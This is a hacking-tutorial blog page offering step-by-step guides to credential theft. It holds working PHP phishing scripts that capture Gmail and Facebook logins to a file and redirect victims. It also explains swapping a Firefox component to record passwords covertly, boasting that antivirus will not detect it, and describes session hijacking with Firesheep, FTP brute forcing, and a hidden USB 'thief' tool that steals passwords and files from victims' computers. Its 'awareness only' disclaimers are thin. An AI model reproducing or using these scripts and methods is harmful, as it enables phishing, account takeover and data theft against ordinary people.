Welcome To The Hacker Club 4U

On This Blog Now You can get knowledge about how to to do hacking and also Know how to prevent from hacking and know many tips And tricks of computer and internet

Hacking

Click Here To Know Many Tricks and Tips Of HACKING facebook,twitter and other accounts and passwords

Hacking Safety And Security

Click Here to know how to protect your computer and inetrnet from hacking and know hacking safety and security tips and tricks

Facebook And Twitter

Click On Picture For TWITTER And Click On This Tittle For FACEBOOK .Hacking And Security Tips Of facebook and twitter.Know how to byepass facebook login and twitter login

Gmail And Yahoo

Click On Above Picture For GMAIL Hacking And Security Tips . And.Click On This Title For YAHOO Hacking and security tips

How to make phishing pages for gmail,orkut,facebook

I don't know how many of you are aware of phishing attacks,Anyway keep in mind that, it is the most common and easiest way to hack anyones personal details.In this article Iam going to share some ideas about Phishing and will show you how to make your own Phishing pages for various sites like gmail or orkut.For making Phishing page for any site you need 3 types of files in common.They are

1) .Html file ( ie fake page )

2) .php file or any other action script page ( for tracking the details that  entered in page created by you )

3) .Txt file ( To save all the details in text format )


In common,every phishing page contains these 3 files,But normally you can see only the fake page which looks exactly as original,remaining files will run in background that will not be visible for you.Here I am going to create a phishing page for gmail login.Procedures for creating phishing pages for all sites are same.I am giving you detailed instructions for making this page,Just follow my steps exactly as i mentioned.

STEPS FOR CREATING PHISHING PAGE.

1 ) First goto Gmail login page ( www.gmail.com,make sure that the page is loaded completely ) and right click and select view source ( in firefox ) or view source code option in other browsers.

2 ) Select all ( CTR + A ) and copy all the code and paste it in notepad.

3 ) Then search for the keyword action.You can see the code as given below.





4 ) Just change the above code as mentioned below






after changing to mail.php ( or anyname.php ) just save it in the form login.html ( anyname.html ). By finishing this step our phishing page is ready.Now we want to create script page for this phishing page.


5 ) For creating a php script,just copy the below php code into notepad and save in the format mail.php (  name mentioned in action of our phishing page )

<?php
header ('Location: http://www.gmail.com ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

6 ) By this step our PHP script is also ready,Now create a .Txt file with name log.txt ( name mentioned in php script )

7 ) Now host these 3 files ie,
login.html

mail.php

log.txt

in any of free hosting servers like ripway,drivehq,100 mb etc (or any other,just google free hosting ).Make sure that these 3 files are in same directory.

8 ) After hosting you will get a direct link to your phishing page,that is to your login.html page.just use this link to access or send phishing page.


HOW PHISHING IS WORKING

When you enter your username and password in gnail login phishing page and click singin or hit enter the mail.php script is loaded and this will copy all the entered details in to your log.txt file.Since we are given www.gmail.com as the header location original gmail page will be loaded after the php script.So the victim will think that they entered wrong information.If victim is already logged in gmail,then their mail will be loaded.


You can also read this HOW TO CREATE PHISHING PAGES FOR FACEBOOK

NOTE : This detailed tutorial is given only for creating awareness about phishing attacks and please dont do this for any harmful purposes.www.thehackerclub4u.tk will not be responsible for any such phishing attacks,KNOW HACKING BUT NO HACKING....

If you found anything useful in this article please pass your comments,All your feedbacks are precious...............

Latest Facebook phishing page and script

Hi friends, this is our latest article regarding Facebook Phishing attack and we are so glad to announce that we have developed some new phishing script for Facebook which is working 100 %.We have already discussed what is phishing and how to create phishing pages for Gmail, Orkut etc. I don't know how many of you are aware of phishing attacks,Anyway keep in mind that, it is the most common and easiest way to hack anyones personal details.In this article Iam going to share some ideas about Phishing and will show you how to make your own Phishing pages for Facebook.For making Phishing page for any site you need 3 types of files in common.They are

  • .Html file ( ie fake page )
  • .Php file or any other action script page (for tracking the details that entered in page created by you)
  • .Txt file ( To save all the details in text format )
HOW TO MAKE FACEBOOK PHISHING PAGE

1. First goto Facebook login page (make sure that the page is loaded completely) and right click and select view source (in firefox) or view source code option in other browsers.

2. Select all ( CTR + A ) and copy all the code and paste it in notepad.

3. Then search(CTR + F) for the keyword action.You can see the code as given below.

action="https://www.facebook.com/login.php?login_attempt=1"

4. Just change the above code as mentioned below

action="pass.php"

after changing to pass.php (or anyname.php) just save it in the form facebook.html (anyname.html). By finishing this step our phishing page is ready.Now we want to create script page for this phishing page.

5. For creating a php script,just copy the below php code into notepad and save in the format pass.php (name mentioned in action of our phishing page)
<?php
$fp = fopen("Passwords.htm", "a");
fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]");
echo "<HTML>
<head>
<FRAMESET cols=\"*\">
<FRAME SRC=\"http://www.facebook.com\">
</FRAMESET>";
?>
Note:‘http://www.facebook.com‘ is the redirection url,When victim will enter his/her email and password he will redirected to’http://www.facebook.com‘

6.  By this step our PHP script is also ready,

7.  Now host these 2 files ie,
  • facebook.html
  • pass.php
in any of free hosting servers like ripway,drivehq,110 mb or t35.com etc (or any other,just google free hosting).Make sure that these 2 files are in same directory.

8. After hosting you will get a direct link to your phishing page,that is to your facebook.html page.just use this link to access or send phishing page.

9. When anyone tries to login through your phishing page a new html page with name password.html will be automatically created in your hosting directory with the password and username entered there.

NOTE : This detailed tutorial is given only for creating awareness about phishing attacks and please dont do this for any harmful purposes.www.thehackerclub4u.tk will not be responsible for any such phishing attacks.

Trick to convert your Firefox browser to a keylogger

HI Friends,Today I am so glad to share a wonderful trick of converting your normal Firefox browser to a keylogger.which can save all the login informations of the users without the knowledge of them.I have personally tested this trick in all the Firefox browser from version 3 onwards and I hope this will work also in lower versions.You may be aware of the fact that,in firefox you can save all the passwords for your favourite sites like gmail,facebook etc.But have you ever think how this password gets saved and where it is saving these sensitive informations.There is an inbuilt component in Firefox browser written in javascript that is offering whether to save your passwords or not.But here we are replacing this script with another script that will never offer the users to save passwords or not,but it directly saves all login informations without the knowledge of the users and you can retrieve all such details later.Ok,Now we can directly move to our trick.Our trick is simple just follow the instructions exactly and you dont need any prior knowledge of programming skills.

STEPS

1) First of all download this Firefox script,you can use the below link



2) If you are Windows user then goto

C:/Program Files/Mozilla Firefox/Components

(This is the default path,you can go directly to your installed directory of Firefox)

If you are MAC user then goto

Applications > Right click Firefox > Show Package Contents > Contents/MacOS/Components

3)
Now find a file nsLoginManagerPrompter.js and copy it to somewhere safe location because we are going to delete this in next step.

4) Extract the rar file that you have downloaded and copy and paste the nsLoginManagerPrompter.js from the folder to the components folder of your Firefox.

5) Now your script is ready.Next is we want to make some changes to the firefox browser.For that directly goto tools--> options from your firefox as shown below.



6)
You can see a window as shown below,just select the security tab and you can see a option like remember passwords for sites,Just tick it as shown below and click ok and just restart your Firefox and thats it Now your firefox keylogger is ready.and it will store automatically all usernames and passwords



HOW TO RETRIEVE STORED PASSWORDS FROM FIREFOX.


1) Now we have created a kelogger using firefox next is how to retrieve passwords stored in firefox.This is so simple just goto

TOOLS-->OPTIONS-->SECURITY-->SAVED PASSWORDS


2) You can see a window as shown below



3) Just click the Show passwords button to see all the passwords like the one given below




ADVANTAGES

  • Since we are only changing the inbuilt component of Firefox,No Antivirus will detect it.
  • You can use it in all platforms like in Windows,Mac etc

HOW TO BE MORE SECURE

If you want to hide all the saved passwords from other users,You can set a master password option as seen in Step 6.But still you are not secure.I personally recommend you all not to save any passwords in any of your browsers.When you save passwords in your browser say you have saved your password for gmail.The next time when you goto gmail login page and selecting the username wll also load your password in asterix.You may think it is in asterix and no one can identify it.But it is so easy to decrypt  it


Also your saved passwords can be easily hacked remotely.So never save any passwords in any of your browsers.

I am currently working on hacking saved passowords remotely and i had a successful test also.I wll post it soon,so keep in touch.

Hope this article helped you a lot.If so please do your comments...your feedbacks are always precious

Hack passwords by Hijacking HTTP cookie using Firesheep


While you are on a public network like your college’s or office’s unsecured wifi.Then this is the time that you should think about your account security.If you think that facebook or Twitter are secured websites then it’s the time to face the reality they are not secured.Whenever you login into your facebook or twiiter account check the address bar of your browser you will see something like http://www.facebook.com/home.php? Similar is the case with twitter.They use http protocol instead of secured https protocol( they use http by default unless changed to https).But if you login into your gmail account you will notice that it uses https protocol.So, the trick I am telling you works only on websites like facebook,twiiter,flickr but not on secured websites like Gmail.So here is Trick to Hack Passwords of these sites on a unsecured Wifi and also the method of protection from this hack.This trick doesnot require any programming knowledge and everyone can use this trick easily.

Release of Firesheep firefox addon really showed how most of the popular websites today are vulnerable to hacking. Eric Butler introduced his Firefox addon Firesheep which is really a masterpiece hacking tool used to hack wireless network users using HTTP session hijacking.

What is HTTP Session Hijacking

As we all know, whenever we login to any website, the webserver of the website replies back with a "cookie" which is used by client browser for further requests. Thus, cookie is used by webserver to identify the logged user and thus, maintain session of this user. Now, if we get this cookie of the victim, we can do all things same as the logged user (victim) himself. Since, we are now having the cookie of victim, webserver grants all session rights of victim to us. This way of hijacking cookies is called session hijacking. We can easily hack wireless network users by this Session Hijacking.

In wireless networks, exchange of cookies takes place through air, due to which one can easily intercept them and this session hijacking can be implemented easily.

Firesheep - How to hack wireless network users:

1. Download Firesheep firefox addon to hack wireless network users.

2. Install this addon in your Firefox (working pefect on Windows XP and Windows Vista). Restart Firefox. Connect to any public wireless network.

3. Now, in the sidebar, hit on "Start Capturing" and Firesheep searches for and captures cookies in wireless network.


4. As soon as anyone on the wireless network visits any insecure website known to Firesheep, their name and photo will be displayed in the sidebar. Now, simply double click on someone and you're into his/her account. Thus, you are able to hack wireless network user.

Websites that are vulnerable to Firesheep:

As is reported, the two social network giants Facebook and Twitter are vulnerable and hence attacked largely by Firesheep. Also, other websites vulnerable are: Foursquare, Gowalla, Amazon.com, Basecamp, bit.ly, Cisco, CNET, Dropbox, Enom, Evernote, Flickr, Github, Google, HackerNews, Harvest, Windows Live, NY Times, Pivotal Tracker, Slicehost, tumblr, WordPress, Yahoo and Yelp.

Solution to Firesheep attack:

Personal Protection:

Firesheep hack can be implemented only if the website does not use secure HTTPS connections. So, we can lay down Firesheep hack, if we inform Firefox to always use secure connections. This can be implemented by using Firefox addon Force-TLS.

Securing whole Wireless network:

Also, it is necessary to secure other users of wireless network. So, FireShephard - the anti-Firesheep tool has been released which shuts down Firesheep running on any computer in the wireless network. FireShephard basically floods the nearby wireless network with packets which are designed to turn off Firesheep. This surely secures all users of the wireless network.

This is all about cookie hijacking.so be secure and alert while using unsecured networks.

Possible Ways To Hack And Crack A Website 2012

Hacking a website not only means taking the whole control of website but can be either changing the website datas or make the website down by making denial of service attack.Here in this article we will see some possible ways of attacking a website.A website can be attacked in any one of the following ways.

  • Password Cracking
  • Simple SQL Injection Hack
  • Brute force attack for servers
  • Denial of service

PASSWORD CRACKING

The first and foremost thing that every hacker must need to hack a website is the hosting IP address of the website.You can directly find the IP address of any website from your command prompt itself.

1. For that open command prompt (window + r) and type cmd and hit enter.

2. Type the following command followed by the URL of the website
nslookup URL address
For example
nslookup www.realhackings.com
and hit enter.you can see a window as shown below with the ip address of the website


Now you have got the IP address of the website.next step is to scan the IP we have got just now to see which protocols the Website at this IP is using

For scanninng DOWNLOAD IP scanner and open it you can see a window as shown below.Just paste the IP you have just got and click scan button.



In the above image FTP is shown,That means this website is using FTP to access to its servers.just double click on the FTP to see a window as shown below


Now this is the final stage.When you enter exact username and password you can login to that website and do whatever you like.To find this username and password we have to do brute force attack

BRUTE FORCE ATTACK

In cryptanalysis, a brute force attack is a method of defeating a cryptographic scheme by trying a large number of possibilities; for example, exhaustively working through all possible keys in order to decrypt a message.Well, to put it in simple words, brute-force attack guess a password by trying all probable variants by given character set. Eg. checking all combination in lower Latin character set, that is 'abcdefghijklmnopqrstuvwxyz'. Brute-force attack is very slow. For example, once you set lower Latin charset for your brute-force attack, you'll have to look through 217 180 147 158 variants for 1-8 symbol password. It must be used only if other attacks have failed to recover your password.For attacking any account using this technique you should need high patience and it will take a lot of time depending upon the number of characters


Denial of service ( Ddos attack ):

A denial of service attack (DOS) is an attack through which a person can render a system unusable or significantly slow down the system for legitimate users by overloading the resources, so that no one can access it.this is not actually hacking a webite but it is used to take down a website.

If an attacker is unable to gain access to a machine, the attacker most probably will just crash the machine to accomplish a denial of service attack,this one of the most used method for website hacking


SQL INJECTION

SQL injection is a vulnerability that allows an attacker to influence the queries that are passed to the back-end database.It has been present since the time databases have been attached to the web applications.Before understanding the how SQL injection attacks we need to understand the Simple Three Tier Architecture or a Four Tier Architecture.This will clear your basics and give you a rough idea of how database-driven web applications work.


NOTE: This is only for the website owners to test their websites for different vulnerabilities and to enable maximum security.

Steal passwords and secret files through usb drives

HI friends,in this article I am going to share some interesting ideas to hack full personal details of a person through their usb ports.All you have to need is USB hack software,that i will provide you for free.
You can use pendrives or portable hard disks for using this hack software.Just install this software to your removable storage device and plug this to your victims PC, and all their personal details will be in your hand.Ok now we can look how to install and use this software.

FEATURES OF USB THIEF

By using USB thief you can get the following details

  • Visited Links List
  • Internet Explorer Cache List
  • Internet Explorer Passwords List
  • Instant Messengers Accounts List
  • Installed Windows Updates List
  • Mozilla Cache List
  • Cookies List
  • Mozilla History List
  • Instant Messengers Accounts List
  • Search Queries List
  • Adapters Report
  • Network Passwords List
  • TCP/UDP Ports List
  • Product Key List
  • Protected Storage Passwords List
  • PST Passwords List
  • Startup Programs List
  • Video Cache List

DOWNLOAD LINK


After downloading USB thief just follow the instructions given below

INSTALLING USB THIEF

1. Decompress the archive and put all the files located in the folder "COPY"into a USB.

2. now run the file "hideh.bat"(this makes the files totaly hiden which can not be seen even using show hide option).

3.now delete the fie "hideh.bat"

WHAT NEXT ??

just plug the USB drive into victims pc open up wait for 4 sec and done...

HOW CAN I GET THE HACKED DETAILS

When you decompress the archive, it will create folder named  "USBThief_WWW.THEHACKERCLUB4U.TK"

1. go in it
    there will b file "showh.bat"

2. just copy it to usb and double click on it
    now refresh
    and u will see the all folders in USB

3. open "IMNeoWorld"

    done,,,there you are !!!!!!!!! you can see all the private files there !!!!!!!!! enjoy !!!!!
If you like this article please pass your comments.All your feedbacks are precious.

Recommend us on Google!

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More